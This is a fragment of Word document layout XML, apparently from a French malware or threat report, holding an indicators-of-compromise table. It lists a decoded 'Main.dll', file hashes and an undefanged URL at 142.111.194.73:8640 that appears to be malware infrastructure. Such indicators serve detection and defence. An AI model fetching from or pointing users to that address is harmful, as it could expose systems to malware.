            <wp:wrapNone/>
            <wp:docPr id="48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065" cy="351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065" h="351155">
                          <a:moveTo>
                            <a:pt x="3670299" y="351155"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="351155"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="351155"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="351155"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="351155"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="351155"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="351155"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="351155"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="351155"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="0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916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1342399</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="8218804"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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82188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8218804">
                          <a:moveTo>
                            <a:pt x="0" y="7937499"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="7937499"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="8218804"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="8218804"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="7937499"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="7309485"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="7309485"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="7938134"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="7938134"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="7309485"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="7149465"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="7149465"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="7309485"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="7309485"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="7149465"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670934" y="7143114"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="7143114"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="6619239"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="6619239"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="7143114"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="597535" y="7143114"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="7143114"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="6619239"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="6619239"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="7143114"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="7143114"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596899" y="7143114"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596899" y="6619239"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="6619239"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="7143114"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670934" y="6618604"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="6618604"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="6264910"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="6264910"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="6618604"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="597535" y="6618604"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="6618604"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="6264910"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="6264910"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="6618604"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="6618604"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596899" y="6618604"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596899" y="6264910"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="6264910"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="6618604"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670934" y="6264274"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="6264274"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="5377179"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="5377179"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="6264274"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="597535" y="6264274"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="6264274"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="5377179"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="5377179"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="6264274"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="6264274"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596899" y="6264274"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596899" y="5377179"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="5377179"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="6264274"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670934" y="5376544"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="5376544"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="4669789"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="4669789"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="5376544"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="597535" y="5376544"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="5376544"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="4669789"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="4669789"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="5376544"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="5376544"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596899" y="5376544"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596899" y="4669789"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="4669789"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="5376544"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670934" y="4669155"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="4669155"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="3962400"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="3962400"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="4669155"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="597535" y="4669155"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="4669155"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="3962400"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="3962400"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="4669155"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="4669155"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596899" y="4669155"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596899" y="3962400"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="3962400"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="4669155"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670934" y="3961765"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="3961765"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="3255009"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="3255009"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="3961765"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="597535" y="3961765"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="3961765"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="3255009"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="3255009"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="3961765"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="3961765"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596899" y="3961765"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596899" y="3255009"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="3255009"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="3961765"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670934" y="3254374"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="3254374"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="2692400"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="2692400"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="3254374"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="597535" y="3254374"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="3254374"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="2692400"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="2692400"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="3254374"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="3254374"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596899" y="3254374"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596899" y="2692400"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="2692400"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="3254374"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670934" y="2691764"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="2691764"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="2125979"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="2125979"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="2691764"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="597535" y="2691764"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="2691764"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="2125979"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="2125979"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="2691764"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="2691764"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596899" y="2691764"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596899" y="2125979"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="2125979"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="2691764"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670934" y="2125345"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="2125345"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="1601469"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="1601469"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="2125345"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="597535" y="2125345"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="2125345"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="1601469"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="1601469"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="2125345"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="2125345"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596899" y="2125345"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596899" y="1601469"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="1601469"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="2125345"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670934" y="1600834"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="1600834"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="1247139"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="1247139"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="1600834"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="597535" y="1600834"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="1600834"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="1247139"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="1247139"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="1600834"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="1600834"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596899" y="1600834"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596899" y="1247139"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="1247139"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="1600834"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670934" y="1246504"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="1246504"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="1246504"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="597535" y="1246504"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="1246504"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="1246504"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="1246504"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596899" y="1246504"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596899" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="1246504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06336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993784</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5734050" cy="351793"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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050" cy="3517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050" h="351789">
                          <a:moveTo>
                            <a:pt x="6350" y="351789"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="351789"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="573405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19648" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>897254</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>990609</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5734050" cy="7501890"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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050" cy="75018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050" h="7501890">
                          <a:moveTo>
                            <a:pt x="600075" y="6349"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="600075" y="7495540"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3175" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3175" y="7501890"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="7498714"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5734050" y="7498714"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="6974205"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="6974205"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="6619875"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="6619875"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="5732145"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="5732145"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="5024755"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="5024755"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="4317365"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="4317365"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="3609974"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="3609974"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="3047365"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="3047365"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="2480945"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="2480945"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1956435"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="1956435"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1602105"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="1602105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20672" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4570729</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>996959</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="7489190"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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74891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7489190">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="748919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21696" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6628130</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>990609</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="7501890"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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75018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7501890">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="750189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33984" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4605020</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3051819</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1435099" cy="1223009"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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5099" cy="12230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5099" h="1223009">
                          <a:moveTo>
                            <a:pt x="635" y="1223009"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="1023619"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="363854" y="1023619"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="363854" y="1223009"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="1024255"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="364490" y="1024255"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="635" y="833119"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="633729"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="608964" y="633729"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="608964" y="833119"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1072514" y="199389"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1072514" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1434465" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1434465" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1071879" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="143509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38080" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5177155</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6300479</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="361953" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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953" cy="1993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1949" h="199390">
                          <a:moveTo>
                            <a:pt x="0" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="361949" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="361949" y="199390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2176" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5676900</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8069589</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="445769" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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5769" cy="1993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5769" h="199389">
                          <a:moveTo>
                            <a:pt x="634" y="199389"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="634" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="445135" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="445135" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="445769" y="634"/>
                          </a:lnTo>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:noFill/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320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8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422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8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5248" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2922270</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1002053</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="260661" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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66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IoC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6272" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1036954</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1002053</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="361941" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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19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Type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7296" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5215890</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1002053</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="803629" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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36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832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1350275</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2100992" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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9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1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Main.dll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décodée depuis </w:t>
                        </w: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CiJL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934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1532913</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="260938" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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9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0368" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6555384</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1532913</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="113903" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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9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1392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1705240</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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73f59cecb1e650ab35ee7363b0118b419318c04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241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1881770</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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10469e5750f80706d5b08a01b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344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2060205</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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https://142.111.194.73:86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446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2239910</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1157576" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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757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40/dj5FZEiLnA/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548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2594240</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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5"/>
                          </w:rPr>
                          <w:t xml:space="preserve">https://142.111.194.73:8640/dj5FZEiLnA/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651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2601618</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="314862" cy="160641"/>
